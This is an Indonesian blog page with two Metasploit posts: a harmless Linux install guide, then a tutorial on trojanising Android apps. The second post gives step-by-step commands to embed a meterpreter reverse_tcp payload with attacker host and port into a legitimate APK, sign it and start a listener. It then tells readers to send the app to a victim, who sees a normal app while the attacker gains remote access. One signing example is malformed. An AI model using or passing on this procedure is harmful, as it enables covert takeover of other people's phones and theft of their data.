Showing posts with label Metasploit. Show all posts
Cara Menginstall Metasploit Di Linux
Toturial kali ini adalah Cara Menginstall Metasploit Di Linux tapi sebelum kita memasuki langkah-langkah dari toturial ini alangkah lebih baiknya kita mengetahui apa itu metasploit
Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.
Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl. Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu.
Seperti produk komersial yang sebanding seperti kanvas Imunitas atau Inti Dampak Core Security Technologies, Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah. Sejak akuisisi dari Metasploit Framework.
Sudah mengerti bukan apa itu Metasploit ? sekarang mari kita memasuki tahap penginstallan dari aplikasi ini.
1. Download Metasploit.
Download Metasploit
Download Metasploit
2. Rubah permission atau izin menjadi rwxr-xr-x
chmod +x metasploit.run
3. Eksekusi metasploit.run
./metasploit.run
Setelah langkah ke-3 sudah dilakukan ama form wizard seperti gambar dibawah akan muncul.
Klik Forward untuk kelangkah selanjutnya.
Klik Radio Button I accept the agreement, kemudian klik tombol Forward.
Masukan /opt/metasploit pada input text untuk folder instalasi Metasploit.
Klik Radio Button Yes apabila anda ingin Service Metasploit diaktifkan ketika OS anda dihidupkan, apabila tidak ingin aktif otomatis silahkan klik No kemudian klik tombol forward.
Masukan SSL Port menjadi 3790 kemudian klik tombol Forward.
Pada Server Name masukan “localhost” dan Days of validity isi menjadi 3650 dan centang tulisan Yes, trus certificate kemudian klik tombol Forward.
Kemudian tunggu sampai selesai proses penginstallannya.
Nah apabila sudah selesai maka Metasploit siap untuk anda gunakan .
Demikian toturial singkat dari M-Supian.ID bagaimana cara menginstall Metasploit di OS Linux anda. Apabila ada kesalahan dalam toturial ini atau ada yang ingin ditanyakan silahkan beri komentar dibawah ini.
Backdooring APK Files With Metasploit Payloads
Sesuai judul nya, kali ini saya akan share cara menyisipkan payloads pada aplikasi android ( .apk ) . Dengan begitu aplikasi apk yang diinstall oleh korban tetap berjalan sebagaimana mestinya, hanya saja payloads juga ikut tereksekusi saat aplikasi dijalankan. Oke langsung saja ke tutorial nya .
Untuk bahan bahannya siahkan download :
Di dalam nya sudah ada tools dalam bahasa ruby untuk meng-embed payload ke dalam file apk nya, serta SignAPK agar file apk nya bisa terinstall di semua jenis android.
Pertama, kalian download dulu file apk yang ingin disisipi backdoor. Bisa di apk4fun atau situs download apk lainnya. Jika sudah punya, skip ke langkah kedua.
Masukkan file .apk nya tadi kedalam satu folder dengan apk-embed.rb .
Lalu masukkan command :
sudo ruby apk-embed.rb [aplikasi.apk] [msfvenom options]
Contoh :
sudo ruby apk-embed.rb com.leo.appmaster-3.3.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.48.1 LPORT=666
Penggunaan sudo disini karena msfvenom membutuhkan hak akses root. Jika kalian sudah berada dalam posisi root sebelumnya, tidak perlu menggunakan sudo.
Jika ada notice :
Infected file com_backdoored.apk ready.
Berarti proses backdooring sudah selesai.
Tahap selanjutnya adalah melakukan sign apk agar file apk yang kita jadikan payload nanti kompatibel di semua versi android.
caranya, masukkan file com_backdoored.apk tadi ke folder SignAPK.
Lalu masukkan perintah :
java -jar signapk.jar certificate.pem key.pk8 fileasli.apk filehasilsign.apk
Contoh :
java -jar certificate.pem key.pk8 com_backdoored.apk com.leo.appmaster-3.3.2.apkSelanjutnya kita set metasploit dengan ip dan port yang sama seperti di payload yang dibuat sebelum nya.
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.48.1
LHOST => 192.168.48.1
msf exploit(handler) > set LPORT 666
LPORT => 666
msf exploit(handler) > exploit
Nah tinggal kirim apk file tadi ke korban.
APK yang telah disisipi payload tadi tetap akan terlihat normal di device korban.
Hanya saja saat aplikasi tersebut dibuka oleh korban, kita juga mendapatkan meterpreter akses di terminal kita.
Untuk yang masih bingung silahkan lihat video nya disini :
Nah mungkin sekian dulu tutorial kali ini, semoga bermanfaat.
Share juga ke teman teman mu biar mereka tau.
Notice :
Saya menulis ini dengan tangan saya, dengan pemikiran saya, dengan gaya bahasa saya, jadi tolong yang mau copas sertakan sumber link hidup ke postingan ini.
Best regards : Jack Wilder
Post Copied From LinuxSec
Subscribe to:
Posts (Atom)